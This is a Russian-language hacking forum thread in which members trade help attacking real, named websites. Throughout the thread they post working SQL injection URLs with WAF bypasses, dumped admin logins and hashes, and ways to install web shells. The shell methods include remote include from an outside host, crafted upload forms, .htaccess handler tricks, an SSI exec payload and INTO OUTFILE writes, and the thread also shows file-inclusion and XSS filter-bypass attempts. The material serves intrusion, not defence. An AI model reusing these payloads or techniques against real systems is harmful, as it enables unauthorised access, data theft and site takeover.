P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.

это Microsoft Access а не MS SQL. Доступа к msysobjects как всегда нету. И в id=1' кавычка не нужна.

']что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
мб потому что это mssql?)
P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
мб потому что это access?)
www.mlsp.government.bg/EIF/forum/reply.asp?id=-4+union+select+1,1,1,1,1,1,1,1,1,username%2b'<=>'%2bpassword,1,1,1,1,1+from+users

l1ght да DB Server:MSSQL

ну вот так

-1'+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+from+information_sche ma.tables+--+ через where+table_name+... (not in '....') както не идет

WAF не дремлет...http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())

izvini a dalse kak budet ??

http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat(table_name)*/+from*/+information_schema.tables*/

ili kak ??
a mojet podrobnee voobse eto kakoy metod ??

LokbatanLi
Например так
http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1

А есть какая-нибудь функция типа NAME_CONST??? В скрипте два запроса. Версия 5. NAME_CONST не работает

LokbatanLi
Например так
http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1

извини Jokester

а ето какоы метод или есть статя об етому ??

При попытки произвести SQl inj выводится ошибка,
но "order by 12" съела, а union+select выдаёт ошибку
Куда копать, если выдаёт такую ошибку ?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1

При попытки произвести SQl inj выводится ошибка,
но "order by 12" съела, а union+select выдаёт ошибку
Куда копать, если выдаёт такую ошибку ?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1


попробуй так
1,2,3,4,5,6,7,8,9,10,11,12+limit+1,1--
1,2,3,4,5,6,7,8,9,10,11,12+information_schema.tabl es--

']попробуй так
не помогло :(

SeNaP,

давай линк, ибо это гадание на кофейной гуще....

не помогло :(
можешь кинуть в личку глянем

можешь кинуть в личку глянем
Спасибо помог :)

извини Jokester

а ето какоы метод или есть статя об етому ??
http://devteev.blogspot.com/search/label/waf

На одном форуме не удалили папку install, движок ipb 2.3.5 выходит ошибка
Скрипт установки заблокирован! Если вам необходимо повторить установку, пожалуйста, удалите файл 'installfiles/lock.php' и обновите страницу.

Как взломать форум через папку install?

Никак

Дайте плз кто-нибудь сайт, где дамп с помощью group_concat не влазит в ограничение в 1024 символа. Это мне прогу прост потестить надо

на моём форуме при выполнении site.com/forum/forumdisplay.php?f=2&do=doenterpwd&newforumpwd&postvars=6889b08fded154a6c1dae5987bc28aaaad754a2aO :11:"vB_Shutdown":1:{s:8:"shutdown";a:1:{i:0;s:7:"phpinfo";}} выходит раскрытие путей, как фиксануть?

error_reporting(0);

Дайте плз кто-нибудь сайт, где дамп с помощью group_concat не влазит в ограничение в 1024 символа. Это мне прогу прост потестить надо


зайди в раздел скулей и выбери подходящую.

error_reporting(0);
где это находиться?

где это находиться?
Это отключает вывод ошибок в PHP
Использование:
<?php error_reporting(0); ?>

Подробнее тут
http://php.net/manual/en/function.error-reporting.php
Совсем подробно вот тут))):
http://tinyurl.com/yane55b

короче ребятки загвоздка вот в чём, не могу придумать как обойти: есть один сайтик, в котором запрос формируется так site.com/catalog_item/156_1_1/ Поманипулировав с параметром 156_1_1 я обнаружил скулю: select * from `dbdrive_catalog_items` where `hid` = "156" order by `ord` limit -20, 20 3. Начал ковыряться дальше вместо 156 поставил 1a5 в надежде, что формирует запрос по знакам _, но не тут то было... получил select * from `dbdrive_catalog_items` where `hid` = "1" order by `ord` limit -20, 20 3. У кого какие мысли??? хотя бы самые отдалённые)

мысль только одна - ссылку в студию

Ы_ы http://www.megatop.by/catalog_item/106_417_1/

Неа...

Инъекция в LIMIT'e, да еще и регулярка RewriteRule только числовые значения принимает.

В начало скрипта добавить надо, вроде
Там пустое место , не индификация

Вот держи рабочую.
http://www.megatop.by/catalog/women/Polusapogi/sezon=Зима')+as+kod+from+dbdrive_catalog_items +union+select+concat_ws(0x3a,database(),user(),ver sion()),222--+
<option value="222">axismoda_megatop:axismoda_megatop@localhost:5.0.86-percona-highperf-b19</option>

я подобрал колличество строк
http://xxxx/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page

теперь выяснил что существует строка под названием id
http:/xxxx/page.php?form_id=75%20union%20select%20+1,2,id,4,5 %20from%20pl_menu_page

не могу найти название остальных строк, (user,users,admin методом перебора ничего не дало) каковы мои действия дальше?
Очень хочу разобраться, help please

Всем привет, хочу научиться скулю, ногами сильно не пинать

http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,version%28%29+from+informa tion_schema.tables--

5.0.51a пятая версия..

http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,table_name+from+informatio n_schema.tables+limit+0,1--

id = CHARACTER_SETS

http://zub.by/page.php?form_id=-75+union+select+1,2,3,4,column_name+from+informati on_schema.columns+limit+0,1--

id = CHARACTER_SET_NAME

Меняй LIMIT+1,1..2,1 итд и дойдешь до нужного столбца типа (admin,passwd,name,user итп)

Всем привет, хочу научиться скулю, ногами сильно не пинать
есть уязвимый сайт,
я подобрал колличество строк
http://zub.by/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page

http://zub.by/page.php?form_id=-75
Version 5.0.51a-24+lenny2+spu1
Database zubby
User zubby@localhost
OS debian-linux-gn
Tables cms_system_users
id 1
Name Администратор
Login admin
Password sa
смаотри еще таблицу pl_user_user
uname test
upassword test

реакция на знак равенства, переменная id не попадает в SQL запрос
http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):

Нужна тулза, для работы со blind sql-inj, 5 ветка. причем чтоб работала по https и с куками)). пох на платформу.


зы:
Перловый гуй от Электа - под виндами требует ссл, который под актив перл не ставится изза ошибки - undef error. соответственно хз как фиксить))

Придется перечислить что пробовал:
sipt,toolza,elekt antichat mysql....
Тулза не поддерживает пока хттпс. Сипт вроде тож.

а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):


Нет.

Такой вопрос, допустим я нашёл таблицу в которой содержатся логин и пасс админа

http://xxx/page.php?form_id=-75+union+select+1,2,3,4,5+from+cms_system_users+li mit+0,1--

Узнать название столбца содержащее логин админа можно только перебирая названия типа admin, user,users, login, password , т.е. только методом перебора напр. так:
http://xxx/page.php?form_id=-75+union+select+1,2,3,4,admin+from+cms_system_user s+limit+0,1--

http://xxx/page.php?form_id=-75+union+select+1,2,3,4,column_name+from cms_system_users+limit+0,1--
(так тоже не выходит)

или как можно узнать названия столбцов в существующей таблице?только перебором? в факах не понял смысла, help please

0x{hex table} а то не поймет)) hex - это строка в шестнадцатеричном виде)

unu']ахаха
column_anme+information_Schema.columns+where+table _name={hex table}
или or 'table'

Прочитал статью бы хоть :(

column_name+from+information_schema.columns+limit+ 0,1--

']column_name+from+information_schema.columns+limit+ 0,1--
Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы

Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы

Не ругаемся господа
Login admin
Password sa
Всем спасибо))

Не ругаемся господа
Login admin
Password sa
Всем спасибо))
Да никто не ругается, просто туты надо читать! И кстати, я думаю, что это не от админки пароль

да от админки в другой таблице, главное что я смысл понял.

неполучаеться обойти xss фильтр
ввожу "'><script>alert(12345)</script>
на выходе &quot;'&gt;&lt;script&gt;alert(12345)&lt;/script&gt;

MySQl 5'тая версия.. когда делаю UNION либо SELECT(без union) то выходит белый экран.. что это может быть?
также прбовал с char/hex

неполучаеться обойти xss фильтр
ввожу "'><script>alert(12345)</script>
на выходе &quot;'&gt;&lt;script&gt;alert(12345)&lt;/script&gt;
Похоже на htmlspecialchars() , его обойти можно только если твоя ксс будет в ссылке с кодировкой UTF-7
http://fitnesslife.com.ua/index.php?id=7647'--+&show=4nalbum&do=showgall&gid=13078
нипанятна, а где скуля ?
http://www.knl.ua/dosug_ss.php?id=63&cat=2+and+substring(version(),1,1)=4
А тут 4 ветка, смотри в топ 5 сайтов. Вывести кажись не получиться т.к. там юнион использовать скорей всего нельзя , ну во всяком случае у меня не вышло ;)

']MySQl 5'тая версия.. когда делаю UNION либо SELECT(без union) то выходит белый экран.. что это может быть?
также прбовал с char/hex


фильтр на стоп-слова

нашёл скулю в одном очень вкусном портале
логин и пасс в таком виде:
admin:4b2f0bd7133666807c1813fef7343777
4b2f0bd7133666807c1813fef7343777-это md5? как теперь быть?путь к админке есть

код странички на перле:


$paramX =~s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;

if ($paramX "") {
my $status=`$xx_cgidir/xyz.pl -m -e $paramX`;


возможен ли обход фильтра и исполнение кода в ос ?

нашёл скулю в одном очень вкусном портале
логин и пасс в таком виде:
admin:4b2f0bd7133666807c1813fef7343777
4b2f0bd7133666807c1813fef7343777-это md5? как теперь быть?путь к админке есть
Хеш, мд5 или мд5(мд5) - неизвестно. Вариант - брутить.

на сайте есть скуль. я подобрал колличество строк. но после этого начало выдавать.

Application uses a value of the wrong type for the current operation.

А на точто неверное кол-во столбцов ругаться перестало. О чем это может говорить?Пробывал вставлять version() результат такой же

запрос такого вида
http://megamegamegeporn.gov/latest.asp?ID=&offset=&prod_id=8896%20union%20select%201,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,version ()--

http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=13078+union+select+1,2,3,4,@@version,6,7,8,9--+

Скобки не используй и крути

скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом:
<?php eval($_GET["cmd"]); ?>
какой запрос надо составить?

Заливаешь свой шелл в формате .txt куда угодно, затем выполняешь
script.php?cmd=include("http://yoursite.com/shell.txt");
Затем через шелл льешь его в нужную папку на целевой сайт.

скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом:
<?php eval($_GET["cmd"]); ?>
какой запрос надо составить?
Создаешь у себя на компе файл lypapam.html

<form enctype=multipart/form-data method=post action="http://lala/shell.php?cmd=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form>

ссылку до переменной http://lala/shell.php?cmd= - редактируешь под себя
открываешь браузером lypapam.html, прикрепляешь шелл и клик на "отправить")
шелл с таким же именем появится в папке с shell.php

ребят, подскажите пожалуйста..
тут копался и в одном сайте при переходе с одного страницы на другую - выдал ошибку:
Warning: include(../news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\biography\index. php on line 107
как я понял - раскрытье путей..
как можно "эксплуатировать" эту ошибку ?

Линк плз в студию.
Либо инклюд, либо раскрытие из-за отсутствия инклюдируемого файла

Линк плз в студию.
Либо инклюд, либо раскрытие из-за отсутствия инклюдируемого файла
:D линк могу в личку кинуть, но хочется сам что то делать и понять.. сколько буду тут своими вопросами надоедать )))

можно реализовать include ...

shell_c0de
Strilo4ka

эта ошибка как бы в нижнем части появлается, в колонке вроде новостей.. мне кажется недоделанный скрипт. Вот даже когда захожу в титульную страницу - опять там эта ошибка :)
вот так выглядет общий вид:
Warning: include(news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107

Warning: include() [function.include]: Failed opening 'news.php' for inclusion (include_path='.;./includes;./pear') in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
И как составить LFI ?

Что за бред? Если в качестве пользовательских параметров не передаются данные, используемые для инклуда, это не уязвимость, а лишь раскрытие путей.

я это не писал, но то итак понятно что если ничне не передаеться - на главной такая ошибка . От пользователя ниче не получаеться то да...
А че может файл был удален или изменен и потому возниакет ошибка . Если дописать то все ок... Ктсати та че говорить надо смотреть действительно. Допустим если нет данных то по умолчанию что то должно выводиться, а если есть то инклуд другой
Не смотрев на этот сайт, я могу сказать, что эта ошибка возникает потому, что файла news.php нету. И это всего лишь раскрытие... Так что не надо тут выдумывать, что это инклуд. И рассказывать о том, что ты знаешь о фильтрах, еще и MQ совать сюда. И еще, скажи - причем здесь /etc/shadow и /etc/passwd? Ты бы еще про мороженое тут написал. Этого не надо! Человек задал конкретный вопрос, если знаешь конкретный ответ - отвечай, нет - пройди мимо. Еще раз говорю, НЕ НАДО писать здесь о том, что ты знаешь, и строить из себя "умного".

PS:ну как - ищеш что нибуть и пытаешся подключить!!!
Отличный ответ.

http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=(select+top+1+orderCardBillAdd ress1+from+Order)--

При попытке получить данные их таблицы Order выдает ошибку:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'Order'.
/cart.asp, line 352

я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!

mailbrush
:D А я думал все сторонники стеба и флуда. спасибо за понимание. таких людей побольше бы в ачате!

Strilo4ka

Мэн, не в обуду, но я не шаря в этом деле - могу сказать, что тут /etc/shadow и /etc/passwd вообше не причем, т.к. из путей видно, что сервер на WINDOWS. По этому речь о /etc/ идти не может.

-------------

И как я понял - это НЕ уязвимость, а просто недоделка веб мастера. Сайт чуть ли не умерший. наверно туда очень редко заходят. сайт персональный (певец). Америкосы делали :)
Вопрос пока в силе - можно ли (и каким образом) пользоватся этим ?
Если логично дуать, то там стоит MSSQL :) хотя.. может и нет..

B1t.exe, кроме как раскрытие путей ты не чего не поимешь, т.к. там тупа нет подключаемого файла news.php
Там типа вот этого

<?php
include "news.php";
?>

а не

<?php
include $_GET[page];
?>

т.е. на запрос повлиять нельзя.
3blK0B, читай http://forum.antichat.ru/thread30501.html

SeNaP
хмм. так и понял, что это не уязвимость :)
вот пробую такие комбинации:
http://www.site.com/index.php? it=1' or 1=(select db_name())--
http://www.site.com/index.php?it=1'
http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +IN FORMATION_SCHEMA.TABLES)--
все вкидывают на главную страницу и никаких ошибок.
может там не MSSQL ? или все же хорошо защищен от иньекции ?

вот пробую такие комбинации:
http://www.site.com/index.php? it=1' or 1=(select db_name())--
http://www.site.com/index.php?it=1'
http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +IN FORMATION_SCHEMA.TABLES)--
все вкидывают на главную страницу и никаких ошибок.
может там не MSSQL ? или все же хорошо защищен от иньекции ?


на

http://www.site.com/index.php? it=1'
or
http://www.site.com/index.php? it=-1'
что выдаёт?

http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=(select+top+1+orderCardBillAdd ress1+from+Order)--

При попытке получить данные их таблицы Order выдает ошибку:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'Order'.
/cart.asp, line 352

я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
from [order], from "order"

никак не могу подобрать названия таблиц.Нашёл orders но не могу подобрать столбцы. Доступа в INFORMATION_SCHEMA.TABLES и Coloms нет помогите раскрутить скулю. Help please

http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,TABLE_NAM E%20FROM%20INFORMATION_SCHEMA.TABLES--+
Если доступа к information_schema нету, выход - брут (перебор) столбцов. Вряд ли за тебя кто-то это сделает.

а по поводу етс/шадов на пути не посмотрел сори
Даже, если бы это была unix-подобная система, /etc/shadow не прочтешь, даже если юзер = root.

на

http://www.site.com/index.php? it=1'
or
http://www.site.com/index.php? it=-1'
что выдаёт?
ноль реакции :( кидает на галвную (ссылка не меняется)

Почему может выходить такая ошибка когда я пытаюсь вывести данные
запрос типа:
http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,email%20f rom%20orders%20--

ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/ProdDetail1.asp, line 20

Почему может выходить такая ошибка когда я пытаюсь вывести данные
запрос типа:
http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,email%20f rom%20orders%20--

ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/ProdDetail1.asp, line 20
MSSQL :(

ноль реакции :( кидает на галвную (ссылка не меняется)
А с чего ты тогда вообще взял, что там SQL inj?

может быть потому что нет таблицы orders и поля email
2 SeNaP а помоему Access


нет когда нет поля он пишет.

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[TCX][MyODBC]Unknown column 'admin' in 'field list'

Развожу руками((

SeNaP

А с чего ты тогда вообще взял, что там SQL inj?
да не откуда, просто пошел интерес и хочется что то понять в это деле. Думал нашел нить и можно цеплятся, а вот облом :(

SeNaP


да не откуда, просто пошел интерес и хочется что то понять в это деле. Думал нашел нить и можно цеплятся, а вот облом :(
Читай (https://forum.antichat.ru/thread43966.html) с начало

MSSQL :(
2 SeNaP а помоему Access
Если доступа к information_schema нету
mysql, причем http://www.limenatural.co.uk/prod1.asp?ID=1+or+substring(version(),1,1)=4

http://www.limenatural.co.uk/prod1.asp?ID=1+or+(1,1)=(select+count(0),concat((s elect+version()),floor(rand(0)*2))+from(orders)+gr oup+by+2)

from [order], from "order"

Спасибо, l1ght! Все работает! А то хотел уже прыгать с моста... С меня креда!

Возможно ли обойти ?

if (isset($_GET['pagina']))
{
$tmp = $_GET['pagina'];
$tmp1 = (eregi_replace("['<>(){}!$%&+@|;'\]","",$tmp));

Возможно ли обойти ?

1/**/union/**/select/**/table_name/**/information_schema.tables/**/limit/**/1,1

Что то типа такого, можно ведь обойтись спокойно и без того что там фильтруется если скуля стандартная. Если хотел воспользоваться теми символами что там режутся то в этой (http://forum.antichat.ru/threadnav56756-1-10.html) статье упоминается про eregi, так что смею предположить что в новых версиях php это не актуально в отличии от ereg.

Возможно ли обойти ?

if (isset($_GET['pagina']))
{
$tmp = $_GET['pagina'];
$tmp1 = (eregi_replace("['<>(){}!$%&+@|;'\]","",$tmp));


точки и слеша в регулярке нет - спокойно можно их юзать, ведь там инклюд же, судя по названию пеерменной :)

На запрос посмотрите:
select count(E.id) from events_comments as E join user as U on U.user_id=E.user_id WHERE event_id=1
Тут только как слепую крутить.

...
http://www.2findlove-or-partners.com/events_view.php?eid=1+union%20select%20version()%2 0and%20row(1,1)%3E(select%20count(*),concat((selec t+version()),0x3a,floor(rand()*2))%20x%20from%20(s elect%201%20union%20select%202)a%20group%20by%20x% 20limit%201)--
Message: Can't execute query: Duplicate entry '4.1.14-standard:0' for key 1

Тут совсем не похоже на Injection так, иле всетаки можно прокрутить?


Warning: Invalid argument supplied for foreach() in /var/www/www.******.co.uk/modules/gateway/PayPal_Subscription/gateway1.inc.php on line 20

Warning: Cannot modify header information - headers already sent by (output started at /var/www/www.******.co.uk/modules/gateway/PayPal_Subscription/gateway1.inc.php:20) in /var/www/www.******.co.uk/includes/functions.inc.php on line 65

Warning: Cannot modify header information - headers already sent by (output started at /var/www/www.******.co.uk/modules/gateway/PayPal_Subscription/gateway1.inc.php:20) in /var/www/www.******.co.uk/includes/functions.inc.php on line 66

Warning: Cannot modify header information - headers already sent by (output started at /var/www/www.******.co.uk/modules/gateway/PayPal_Subscription/gateway1.inc.php:20) in /var/www/www.******.co.uk/includes/functions.inc.php on line 68

Может ли существовать фильтрация на выходе
www.************.com/index.php?eid=1+union+select+ID+from+users --
подбирая таблицы и строки пришёл к тому что 100% существуют эта таблица и строка
Может ли быть фильтрация на выходе, потому что после того как я делаю этот запрос выходит окно , как будто без юнион селекта, но без вывода необходимых мне данных.

Почему при запросе http://site/traw/4602'--+/
SELECT * FROM tse_articles WHERE id='4602'--+'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Пробовал много вариантов все равно одно и тоже

Используй комментарий %23

Пробовал) не помогает

/*%00 попробуй

лучше всегда пробовать ссылку сразу давать

лучше всегда пробовать ссылку сразу давать
http://www*materinstvo*ru/art/4610'/

Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка

http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,count(*),5,6,7+from+users--


0 записей

Не хочет в базу писать русские символы.
Это инъекция, так что запрос только такой.
INSERT _cat SET category='0' а дальше можно дописывать
INSERT _cat SET category='0', 2_category='0', name_cat='Русский', en_name_cat='sd', description='', sort_index='0'

есть какие то варианты туда их запихнуть всетаки)?

Проблему решил!

name_cat=CHAR(0xF6F3E0F6F3E0 USING cp1251)

http://www*materinstvo*ru/art/4610'/

хз, подстава какая-то:


http://www.materinstvo.ru/art/4610'
http://materinstvo.ru/?module=articles&id=4610'

Хитрюги :)

exception 'ZSecurityException' with message 'Not enough privileges! ' in /opt/appl/ecare/4.0.0_042/public/specific/ZEcareBusinessLogic.php:136 Stack trace: #0 /opt/appl/ecare/4.0.0_042/public/specific/BusinessLogic/GetUnbilledCallsBLHelper.php(55): ZEcareBusinessLogic->validateAllowedMsisdnId(''1' '2'') #1 /opt/appl/ecare/4.0.0_042/ext/Common/ZBusinessLogic.php(58): GetUnbilledCallsBLHelper->checkPrivileges() #2 /opt/appl/ecare/4.0.0_042/public/requests/listUnbilledCalls.php(21): ZBusinessLogic->execute(Array) #3 /opt/appl/ecare/4.0.0_042/public/index.php(56): include_once('/opt/appl/ecare...') #4 {main}


парни при токой ошибке можно чтото намутить?
это от моей мобильной телефонной компании

'Not enough privileges! ' i
Обычная ошибка....не достаточно прав для входа туды...Англ. стоит иногда учить

да нет я это тока шяс заметил насчёт привилегий...

как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...

как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
1)найти раскрытие в скрипте
2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь (http://forum.antichat.ru/thread49775.html) )
3)попробывать найти в кеше поисковиков/веб архиве
4)побегать с бубном и угадать

Помогите плиз! Бред какойто... тренируюсь в скулях. Вот мой код

if(isset($_POST['login']) && isset($_POST['password']))
{
$login=$_POST['login'];
$password=md5($_POST['password']);
$query="SELECT * FROM users WHERE login='$login' AND password='$password' LIMIT 1";
echo $query;
$response=mysql_query($query);
$result=mysql_fetch_array($response);
if($login==$result['login'] && $password==$result['password'])
$_SESSION['id']=$result['id'];
}
if(!isset($_SESSION['id']))
{
echo "
<form method=post>
<table>
<tr><td>Логин:</td><td><input type=text name=login></td></tr>
<tr><td>Пароль:</td><td><input type=text name=password></td></tr>
<tr><td><input type=submit name=submit value=Вход></td></tr>
</table>";
exit;
}

таблица users:

id | login | password
1 | admin | md5passs


я подставляю в форму логин: admin'; --
пароль: bla bla bla
сделал в сурипте отладочный вывод заппроса

SELECT * FROM users WHERE login='admin'; --' AND password='698d51a19d8a121ce581499d7b701668' LIMIT 1

но нифига не заходит, пишет Warning: mysql_fetch_array(): supplied argument is not a valid MySQL........

После каждого запроса дописывай or die(mysql_error())... И будешь видеть суть ошибки.

После каждого запроса дописывай or die(mysql_error())... И будешь видеть суть ошибки.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '36eba1e1e343279857ea7f69a597324e' LIMIT 1' at line 1

помогите ктонить знающий в чём трабла?

UPD: зашло двое мемберов и хер кто ответил...

admin' or 'admin'='admin' --
(После -- пробел обязательно =\ )


Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,4,(SELECT+concat_ws(0x3a,logi n,pass)+FROM+users),6,7+--+

Видимо она вообще пустая =\

Есть какая-нибудь функция для определения текущей базы без скобок???
Всё кроме неё нашёл, мб кому-то и пригодится

user(), current_user(), system_user(), session_user() = current_user
version() = @@version
ось я только как без скобок знаю @@version_compile_os
А вот database() =???

можно так:

SELECT schema_name FROM information_schema.schemata limit 0,1
SELECT schema_name FROM information_schema.schemata limit 1,1
.....

не текущая, но все узнаешь, в принципе относительно по барабану, какая текущая, очень много вкусного бывает и в остальных

как можно обойти фильтрацию загружаемого файла в админке ?!
по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?

как можно обойти фильтрацию загружаемого файла в админке ?!
по сути можно загружать "все файлы", но при заливке пхп-скрипта вылезает ошибка...что можно в таких случаях сделать ?
.php5 попробуй залить

не прокатило...там допустимо только JPG, GIF, PNG

тоже нет...
может я бред говорю но нельзя ли сделать что-то вроде этого (http://www.cyberguru.ru/web/web-programming/image-xss.html)
т.е. к картинке приписать захексенный вредоносный код. не прокатит ?

а .htaccess можно залить?

а .htaccess можно залить?
можно

а если shell.php%00.gif то обработается корректно или нет ?

так попробуй загрузить .htaccess и в нем прописать "AddHandler x-httpd-php .gif"

Наткнулся на сайт __http://www.kvartal.ru, побродил по ссылкам и сразу нашел ошибку скрипта при подстановки в параметр кавычки:
__http://www.kvartal.ru/index.php?id=21%27
По всему похоже, что может получиться стандартная скуль, но пока не получается: пробовал вот как
1) http://www.kvartal.ru/index.php?id=21+and+1=1
2) http://www.kvartal.ru/index.php?id=21+and+1=2
вывод одинаковый, подстановка коментов тоже не помогла, ну и как и следовало ожидать подбор столбцов через order by тоже ни к чему не привел. Походу это ошибка скрипта, но не скуль.
Есть предположения в чем проблема?

Банальная строковая иньекция
http://www.quarta.su/index.php?id=621'+and+1=1/*&type=65

http://www.quarta.su/index.php?id=62d1%27+union+select+1,2,3,4,version% 28%29,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24/*&type=65

http://www.quarta.su/index.php?id=62d1'+union+select+1,2,3,4,group_conc at(concat_ws(0x3a,id_user,login,pswd)),6,7,8,9,0,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24+from+admi ns/*&type=65

Админка:
http://www.quarta.su/adm/index.php

Все понял, спасибо. Ошибка была в том, что у параметра кавычку убирал и условия ставил.

хм...когда я заливаю шелл через админку, и потом прохожу по его урлу почему-то отображается сам код пхп-шелла, т.е он сам не выполняется...в чем причина ?

хм...когда я заливаю шелл через админку, и потом прохожу по его урлу почему-то отображается сам код пхп-шелла, т.е он сам не выполняется...в чем причина ?

.htaccess мб

Если прикручен модуль mod_include
попробуй загрузить shell.txt с данными:
<!--#exec cmd="uname -a"-->

Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
Я знаю что существует таблица email со строкой id и mail но при выполнении такого запроса
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+mail+from+email%20--
Выводит обычное окно как без запроса, как это можно обойти?

Слепая

_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

Duplicate column name '5.0.77'

Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
i добавь к имени базы и появится)
:.']Слепая

_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

Duplicate column name '5.0.77'
проще наверно так)
http://www.parperfecto.com/able/events_view.php?eid=3+into+outfile+'/var/www/vhosts/parperfecto.com/httpdocs/yaneshell.php'+fields+enclosed+by+'<?phpinfo();?>'
http://www.parperfecto.com/yaneshell.php

вот например здесь..
